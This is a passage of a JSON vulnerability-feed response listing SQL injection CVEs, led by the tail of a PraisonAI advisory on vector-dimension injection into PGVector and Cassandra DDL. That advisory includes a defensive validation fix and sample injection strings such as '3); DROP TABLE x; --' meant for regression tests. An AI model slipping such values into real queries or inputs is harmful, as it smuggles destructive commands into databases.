boundary plus backend-level defense in depth:\n\n```python\ndef validate_vector_dimension(value: object) -> int:\n    if isinstance(value, bool) or not isinstance(value, int):\n        raise ValueError(\"dimension must be an integer\")\n    if value <= 0 or value > 200000:\n        raise ValueError(\"dimension is outside the supported range\")\n    return value\n```\n\nUse the validated integer in PGVector, Cassandra, ClickHouse, SingleStore, and any other DDL-generating backend. Add regression tests that malicious values such as `3); DROP TABLE x; --` and `3>; DROP TABLE x; --` raise before any driver `execute()` call, alongside the existing malicious collection-name tests.\n\n## Affected Package/Versions\n\nAffected package: `praisonai`.\n\nThe source sweep found the same dimension interpolation pattern in both PGVector and Cassandra backends at `v3.10.0`, `v4.5.128`, `v4.6.59`, `v4.6.62`, `v4.6.63`, `v4.6.64`, and current main commit `3aa9cbc2bd49c23a32be0a89a5e620d13d843eab`. A conservative affected range is `praisonai >= 3.10.0, <= 4.6.64` plus current main, for installations using the PGVector or Cassandra knowledge-store backends and exposing collection dimensions to lower-trust input. No fixed version was identified in the checked source.\n\n## Advisory History\n\nRepository security advisories were checked on 2026-06-19. The closest public advisory is `GHSA-3643-7v76-5cj2`, \"PraisonAI knowledge-store backends interpolate unvalidated collection names into SQL and CQL queries\". Current head contains the follow-up identifier validation for schema, keyspace, and collection names, and the PoV negative controls confirm that collection-name injection is now rejected. This report is distinct because the unvalidated input is the vector dimension, the affected DDL fields are `embedding vector({dimension})` and `embedding vector<float, {dimension}>`, and the issue remains after the identifier hardening.\n\nOther checked comparators include conversation-store `table_prefix` SQL injection advisories (`GHSA-rg3h-x3jw-7jm5`, `GHSA-x783-xp3g-mqhp`) and unrelated Platform, Context, deployment, and agent-tool advisories. No checked advisory matched vector dimension interpolation in PGVector or Cassandra knowledge-store DDL.\n\n## References\n\n- `src/praisonai/praisonai/persistence/knowledge/pgvector.py`\n- `src/praisonai/praisonai/persistence/knowledge/cassandra.py`\n- `src/praisonai/praisonai/persistence/knowledge/base.py`\n- `https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2`\n- `https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5`\n- `https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp`","cveId":"CVE-2026-60090","cvssScore":null,"cvssVector":null,"severity":"medium","vendor":"PyPI","product":"praisonai","affectedVersions":["pkg:pypi/praisonai < 4.6.78"],"cwes":["CWE-89","CWE-943"],"tags":["osv","osv:ghsa-wf65-4jjx-q444","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-wf65-4jjx-q444","type":"advisory","title":"OSV GHSA-wf65-4jjx-q444"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-wf65-4jjx-q444","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-60090","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/3aa9cbc2bd49c23a32be0a89a5e620d13d843eab","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-sql-cql-injection-via-vector-dimension","type":"other","title":"OSV web"}],"epssScore":0.00702,"epssPercentile":0.51797,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T17:17:01.000Z","addedAt":"2026-10-08T18:42:42.171Z","updatedAt":"2026-10-08T18:42:42.171Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-60090","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-60090","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-wf65-4jjx-q444"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-wf65-4jjx-q444"}]},{"id":"a53af152-5e85-4114-91d3-7208aceb73da","slug":"cve-2026-105076","externalId":"CVE-2026-105076","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105076 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appsbd Vitepos vitepos-lite allows Blind SQL …","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appsbd Vitepos vitepos-lite allows Blind SQL Injection.This issue affects Vitepos: from n/a through 3.6.1.","cveId":"CVE-2026-105076","cvssScore":7.6,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://patchstack.com/database/wordpress/plugin/vitepos-lite/vulnerability/wordpress-vitepos-plugin-3-6-1-sql-injection-vulnerability?_s_id=cve","type":"advisory","title":"audit@patchstack.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T13:17:12.763Z","addedAt":"2026-10-08T14:40:02.468Z","updatedAt":"2026-10-08T18:39:31.227Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105076","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105076","note":"authoritative record"}]},{"id":"97812192-ee92-44bd-a842-b20f1ff003e7","slug":"cve-2026-12260","externalId":"CVE-2026-12260","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-12260 — SQL injection in the NetBoard CRM demo platform; specifically, the vulnerable component is the ‘user-name’ POST parameter in the ‘/module/auth/reco…","description":"SQL injection in the NetBoard CRM demo platform; specifically, the vulnerable component is the ‘user-name’ POST parameter in the ‘/module/auth/recovery.php’ endpoint. The parameter is vulnerable to blind attacks based on Boolean, error, time-based and UNION techniques. Exploitation allows attackers to extract confidential information (such as the version and type of backend used), alter data or further compromise the CRM environment.","cveId":"CVE-2026-12260","cvssScore":10,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-netboard-crm-demo-platform","type":"advisory","title":"cve-coordination@incibe.es"}],"epssScore":0.00228,"epssPercentile":0.12441,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T09:16:41.087Z","addedAt":"2026-10-08T10:39:34.913Z","updatedAt":"2026-10-08T23:06:37.258Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-12260","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-12260","note":"authoritative record"}]},{"id":"799ae062-45b7-48bf-a72f-abf704246179","slug":"cve-2026-5048","externalId":"CVE-2026-5048","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-5048 — In Brocade SANnav before 3.0.0a, an SQL Injection vulnerability in various external API inventories have a vulnerability that allows an authenticat…","description":"In Brocade SANnav before 3.0.0a, an SQL Injection vulnerability in various external API inventories have a vulnerability that allows an authenticated attacker to inject malicious data into some of the REST API -query parameters.","cveId":"CVE-2026-5048","cvssScore":6.1,"cvssVector":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://support.broadcom.com/external/content/SecurityAdvisories/0/37932","type":"advisory","title":"sirt@brocade.com"}],"epssScore":0.00186,"epssPercentile":0.07525,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T06:16:43.273Z","addedAt":"2026-10-08T06:39:29.702Z","updatedAt":"2026-10-08T21:05:47.129Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-5048","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-5048","note":"authoritative record"}]},{"id":"115b0d4e-047c-4664-9be9-2da42bff4db8","slug":"cve-2026-76270","externalId":"CVE-2026-76270","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-76270 — In Splunk Enterprise versions below 10.4.3, a user that holds a role with the list_spl2_modules capability could use SQL injection in SPL2 module f…","description":"In Splunk Enterprise versions below 10.4.3, a user that holds a role with the list_spl2_modules capability could use SQL injection in SPL2 module filtering to access all relevant data available through the affected Representational State Transfer (REST) API, including private SPL2 module definitions belonging to other users. The vulnerability is possible because Splunk Enterprise and Splunk Cloud Platform do not parameterize user-supplied values before using them in database queries for SPL2 module filtering. For more information see Manage SPL2 modules (https://help.splunk.com/en/splunk-enterprise/search/spl2-search-manual/multiple-searches-in-an-spl2-module/manage-spl2-modules) and Module permissions (https://help.splunk.com/en/splunk-enterprise/search/spl2-search-manual/modules-statements-and-views/module-permissions) in the Splunk documentation.\n\nSplunk Enterprise versions 10.2.x, 10.0.x, and 9.4.x are not affected.","cveId":"CVE-2026-76270","cvssScore":6.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://advisory.splunk.com/advisories/SVD-2026-1001","type":"advisory","title":"psirt@cisco.com"}],"epssScore":0.00245,"epssPercentile":0.14428,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T21:17:17.907Z","addedAt":"2026-10-07T22:39:36.616Z","updatedAt":"2026-10-08T21:05:44.273Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-76270","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-76270","note":"authoritative record"}]},{"id":"92d0d4cb-30e1-49ea-b14c-8ef5932b29cc","slug":"cve-2026-95605","externalId":"CVE-2026-95605","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-95605 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Passionate Programmer Peter WP Data Access al…","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Passionate Programmer Peter WP Data Access allows Blind SQL Injection.\n\nThis issue affects WP Data Access: from n/a through 5.5.82.","cveId":"CVE-2026-95605","cvssScore":9.3,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://patchstack.com/database/wordpress/plugin/wp-data-access/vulnerability/wordpress-wp-data-access-plugin-5-5-82-sql-injection-vulnerability?_s_id=cve","type":"advisory","title":"audit@patchstack.com"}],"epssScore":0.0025,"epssPercentile":0.14965,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T17:17:04.063Z","addedAt":"2026-10-07T18:39:31.633Z","updatedAt":"2026-10-08T18:39:30.578Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-95605","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-95605","note":"authoritative record"}]},{"id":"7ba27ee8-43be-416a-b079-84e140b81f0c","slug":"cve-2026-76452","externalId":"CVE-2026-76452","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-76452 — A vulnerability in the web-based management interface of Cisco License On-Prem, formerly Cisco Smart Software Manager On-Prem (SSM On-Prem), could …","description":"A vulnerability in the web-based management interface of Cisco License On-Prem, formerly Cisco Smart Software Manager On-Prem (SSM On-Prem), could allow an authenticated, remote attacker to conduct SQL injection attacks against an affected application.\r\n\r\nThis vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface. A successful exploit could allow the attacker to read additional contents of the internal database of an affected application that should not normally be accessible to administrative users, thus impacting system confidentiality.\r\nTo exploit this vulnerability, the attacker must have valid administrative user credentials on the affected application.","cveId":"CVE-2026-76452","cvssScore":4.9,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ssm-access-nttb2dhE","type":"advisory","title":"psirt@cisco.com"}],"epssScore":0.0037,"epssPercentile":0.28879,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T17:16:56.933Z","addedAt":"2026-10-07T18:39:31.366Z","updatedAt":"2026-10-08T21:05:42.555Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-76452","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-76452","note":"authoritative record"}]},{"id":"09795cf9-5d7e-48bc-a264-d6b9baee5be1","slug":"cve-2026-62251","externalId":"CVE-2026-62251","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-62251 — Homer is open source telecom observability software.","description":"Homer is open source telecom observability software. Prior to version 11.0.283, the `V4StatisticsQuery` handler passes the user-supplied `rawquery` field directly to DuckDB without calling the `sqlvalidator.ValidateRawSQL` function used throughout the rest of the codebase. Any authenticated user can execute arbitrary SQL statements against all data accessible through the FlightSQL service. Version 11.0.283 patches the issue.","cveId":"CVE-2026-62251","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","severity":"high","vendor":"Go","product":"github.com/sipcapture/homer-app","affectedVersions":["pkg:golang/github.com/sipcapture/homer-app < 0.0.0-20260625085520-a7d027dc684b"],"cwes":["CWE-89"],"tags":["nvd","status:received","osv","osv:ghsa-f46q-3v67-fmm4","ecosystem:go","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/sipcapture/homer/commit/a7d027dc684b210b62285c49f555ac88d64f35f0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/sipcapture/homer/pull/837","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/sipcapture/homer/releases/tag/11.0.283","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/sipcapture/homer/security/advisories/GHSA-f46q-3v67-fmm4","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-f46q-3v67-fmm4","type":"advisory","title":"OSV GHSA-f46q-3v67-fmm4"},{"url":"https://github.com/sipcapture/homer","type":"vendor","title":"OSV package"}],"epssScore":0.00341,"epssPercentile":0.25548,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T17:16:56.303Z","addedAt":"2026-10-07T18:39:31.336Z","updatedAt":"2026-10-08T23:06:36.716Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62251","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-62251","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-F46Q-3V67-FMM4"}]},{"id":"fb0322e6-0e7c-4b6d-a964-51dcc4de0e5d","slug":"cve-2026-42710","externalId":"CVE-2026-42710","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-42710 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 10Web Slider by 10Web slider-wd allows Blind …","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 10Web Slider by 10Web slider-wd allows Blind SQL Injection.This issue affects Slider by 10Web: from n/a through 1.2.63.","cveId":"CVE-2026-42710","cvssScore":7.6,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://patchstack.com/database/wordpress/plugin/slider-wd/vulnerability/wordpress-slider-by-10web-plugin-1-2-63-sql-injection-vulnerability?_s_id=cve","type":"advisory","title":"audit@patchstack.com"}],"epssScore":0.00226,"epssPercentile":0.12267,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T12:17:09.810Z","addedAt":"2026-10-07T12:39:43.967Z","updatedAt":"2026-10-07T18:39:30.930Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42710","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-42710","note":"authoritative record"}]},{"id":"5b9fefeb-2e22-436e-bf09-4ac03814cdd2","slug":"cve-2026-42708","externalId":"CVE-2026-42708","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-42708 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AF themes WP Post Author wp-post-author allow…","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AF themes WP Post Author wp-post-author allows Blind SQL Injection.This issue affects WP Post Author: from n/a through 4.0.0.","cveId":"CVE-2026-42708","cvssScore":7.6,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://patchstack.com/database/wordpress/plugin/wp-post-author/vulnerability/wordpress-wp-post-author-plugin-4-0-0-sql-injection-vulnerability?_s_id=cve","type":"advisory","title":"audit@patchstack.com"}],"epssScore":0.00226,"epssPercentile":0.12267,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T12:17:09.650Z","addedAt":"2026-10-07T12:39:43.960Z","updatedAt":"2026-10-07T20:39:40.148Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42708","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-42708","note":"authoritative record"}]},{"id":"7312838a-81f0-4e1c-92a4-767059057eec","slug":"cve-2026-42714","externalId":"CVE-2026-42714","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-42714 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Piggly Dev Pix por Piggly (para Woocommerce) …","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Piggly Dev Pix por Piggly (para Woocommerce) pix-por-piggly allows Blind SQL Injection.This issue affects Pix por Piggly (para Woocommerce): from n/a through 2.1.2.","cveId":"CVE-2026-42714","cvssScore":7.6,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://patchstack.com/database/wordpress/plugin/pix-por-piggly/vulnerability/wordpress-pix-por-piggly-para-woocommerce-plugin-2-1-2-sql-injection-vulnerability?_s_id=cve","type":"advisory","title":"audit@patchstack.com"}],"epssScore":0.00226,"epssPercentile":0.12266,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T11:17:19.237Z","addedAt":"2026-10-07T12:39:43.883Z","updatedAt":"2026-10-07T18:39:30.891Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42714","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-42714","note":"authoritative record"}]},{"id":"131b49aa-0df1-4d05-91f1-16e7429ddb63","slug":"cve-2026-42713","externalId":"CVE-2026-42713","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-42713 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Gopiplus Post title marquee scroll post-title…","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Gopiplus Post title marquee scroll post-title-marquee-scroll allows Blind SQL Injection.This issue affects Post title marquee scroll: from n/a through 9.9.","cveId":"CVE-2026-42713","cvssScore":7.6,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://patchstack.com/database/wordpress/plugin/post-title-marquee-scroll/vulnerability/wordpress-post-title-marquee-scroll-plugin-9-9-sql-injection-vulnerability?_s_id=cve","type":"advisory","title":"audit@patchstack.com"}],"epssScore":0.00226,"epssPercentile":0.12268,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T11:17:19.093Z","addedAt":"2026-10-07T12:39:43.876Z","updatedAt":"2026-10-07T20:39:40.140Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42713","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-42713","note":"authoritative record"}]}],"pagination":{"page":1,"limit":20,"total":2372,"totalPages":119,"hasNext":true,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-09T00:24:57.529Z","durationMs":48,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-89"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}